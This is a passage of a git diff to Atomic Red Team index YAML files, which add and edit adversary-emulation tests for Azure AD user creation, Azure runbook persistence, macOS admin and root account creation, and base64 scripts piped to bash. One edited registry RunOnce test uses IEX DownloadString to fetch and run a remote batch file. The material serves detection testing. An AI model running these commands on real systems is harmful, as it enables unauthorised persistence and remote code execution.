 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Process Discovery](../../T1057/T1057.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml
index 53b4d15a..0fc12621 100644
--- a/atomics/Indexes/azure-ad-index.yaml
+++ b/atomics/Indexes/azure-ad-index.yaml
@@ -27610,6 +27610,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -36518,7 +36519,96 @@ persistence:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1136.003
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure AD - Create a new user
+      auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
+      description: Creates a new user in Azure AD. Upon successful creation, a new
+        user will be created. Adversaries create new users so that their malicious
+        activity does not interrupt the normal functions of the compromised users
+        and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Get-InstalledModule -Name AzureAD
+        get_prereq_command: echo "use the following to install AzureAD PowerShell
+          module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery
+          -Force"
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "Connect-AzureAD\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\n$PasswordProfile =
+          New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile\n$PasswordProfile.Password
+          = $password\nNew-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile
+          -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName
+          $username      "
+        cleanup_command: Remove-AzureADUser -ObjectId "#{userprincipalname}"
+        name: powershell
+    - name: Azure AD - Create a new user via Azure CLI
+      auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
+      description: Creates a new user in Azure AD via the Azure CLI. Upon successful
+        creation, a new user will be created. Adversaries create new users so that
+        their malicious activity does not interrupt the normal functions of the compromised
+        users and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if Azure CLI is installed and install manually
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI manually
+          https://aka.ms/installazurecliwindows"
+      - description: Check if Azure CLI is installed and install via PowerShell
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference
+          = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows
+          -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I
+          AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+      - description: Update the userprincipalname to meet your requirements
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "az login\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\naz ad user create
+          --display-name $username --password $password --user-principal-name $userprincipalname\naz
+          ad user list --filter \"displayname eq 'atomicredteam'\"     "
+        cleanup_command: az ad user delete --id
+        name: powershell
   T1098:
     technique:
       x_mitre_platforms:
@@ -36622,7 +36712,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -36647,7 +36738,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -36659,7 +36750,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -52046,6 +52137,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
diff --git a/atomics/Indexes/containers-index.yaml b/atomics/Indexes/containers-index.yaml
index a121166e..8657a87e 100644
--- a/atomics/Indexes/containers-index.yaml
+++ b/atomics/Indexes/containers-index.yaml
@@ -26845,11 +26845,6 @@ execution:
         '
       supported_platforms:
       - containers
-      input_arguments:
-        command:
-          description: Command to run
-          type: string
-          default: cat
       dependencies:
       - description: 'docker must be installed
 
@@ -27865,6 +27860,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -51766,6 +51762,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
diff --git a/atomics/Indexes/google-workspace-index.yaml b/atomics/Indexes/google-workspace-index.yaml
index d7c02055..117d7e9d 100644
--- a/atomics/Indexes/google-workspace-index.yaml
+++ b/atomics/Indexes/google-workspace-index.yaml
@@ -27522,6 +27522,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -51312,6 +51313,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
diff --git a/atomics/Indexes/iaas-index.yaml b/atomics/Indexes/iaas-index.yaml
index 680550b0..7bf0175d 100644
--- a/atomics/Indexes/iaas-index.yaml
+++ b/atomics/Indexes/iaas-index.yaml
@@ -27418,6 +27418,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -51156,6 +51157,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
diff --git a/atomics/Indexes/iaas_aws-index.yaml b/atomics/Indexes/iaas_aws-index.yaml
index 27c4c7af..c0590a59 100644
--- a/atomics/Indexes/iaas_aws-index.yaml
+++ b/atomics/Indexes/iaas_aws-index.yaml
@@ -27561,6 +27561,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -51468,6 +51469,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
diff --git a/atomics/Indexes/iaas_azure-index.yaml b/atomics/Indexes/iaas_azure-index.yaml
index 39bb8d82..7ebbea82 100644
--- a/atomics/Indexes/iaas_azure-index.yaml
+++ b/atomics/Indexes/iaas_azure-index.yaml
@@ -14090,7 +14090,56 @@ defense-evasion:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1480.001:
     technique:
       x_mitre_platforms:
@@ -24323,7 +24372,56 @@ privilege-escalation:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -27498,6 +27596,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -36345,7 +36444,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -36374,7 +36474,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -36389,7 +36489,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -39931,7 +40031,56 @@ persistence:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -51578,6 +51727,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
@@ -63243,7 +63393,56 @@ initial-access:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1566.003:
     technique:
       x_mitre_platforms:
diff --git a/atomics/Indexes/iaas_gcp-index.yaml b/atomics/Indexes/iaas_gcp-index.yaml
index d7c02055..117d7e9d 100644
--- a/atomics/Indexes/iaas_gcp-index.yaml
+++ b/atomics/Indexes/iaas_gcp-index.yaml
@@ -27522,6 +27522,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -51312,6 +51313,7 @@ discovery:
       - 'Cloud Storage: Cloud Storage Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
     atomic_tests: []
   T1217:
     technique:
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index bdcb2daf..09a45a5c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -6799,6 +6799,52 @@ defense-evasion:
           echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
           echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
           echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
+    - name: Linux Base64 Encoded Shebang in CLI
+      auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+      description: "Using Linux Base64 Encoded shell scripts that have Shebang in
+        them. This is commonly how attackers obfuscate passing and executing a shell
+        script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
+        by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
+        Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
+        for it. \n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        bash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        dash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        fish_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        sh_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
+      dependencies:
+      - description: 'base64 must be present
+
+          '
+        prereq_command: 'which base64
+
+          '
+        get_prereq_command: 'echo "please install base64"
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          echo #{bash_encoded} | base64 -d | bash
+          echo #{dash_encoded} | base64 -d | bash
+          echo #{fish_encoded} | base64 -d | bash
+          echo #{sh_encoded} | base64 -d | bash
   T1562:
     technique:
       x_mitre_platforms:
@@ -11178,7 +11224,7 @@ defense-evasion:
       description: Modify event viewer registry values to alter the behavior of the
         online help redirection. Upon opening an event in event viewer and attempting
         to view the help page for the event, it will execute the program defined in
-        thed redirection program registry entry.
+        the redirection program registry entry.
       supported_platforms:
       - windows
       input_arguments:
@@ -26073,6 +26119,55 @@ defense-evasion:
           this atomic test : https://cloud.google.com/sdk/docs/install"
 
           '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1480.001:
     technique:
       x_mitre_platforms:
@@ -27097,6 +27192,45 @@ defense-evasion:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
@@ -37111,7 +37245,7 @@ privilege-escalation:
       executor:
         command: |
           $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
@@ -37161,7 +37295,8 @@ privilege-escalation:
     - name: Suspicious bat file run from startup Folder
       auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
       description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
         Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
         folder and will also run when the computer is restarted and the user logs in.
       supported_platforms:
@@ -41885,6 +42020,55 @@ privilege-escalation:
           this atomic test : https://cloud.google.com/sdk/docs/install"
 
           '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
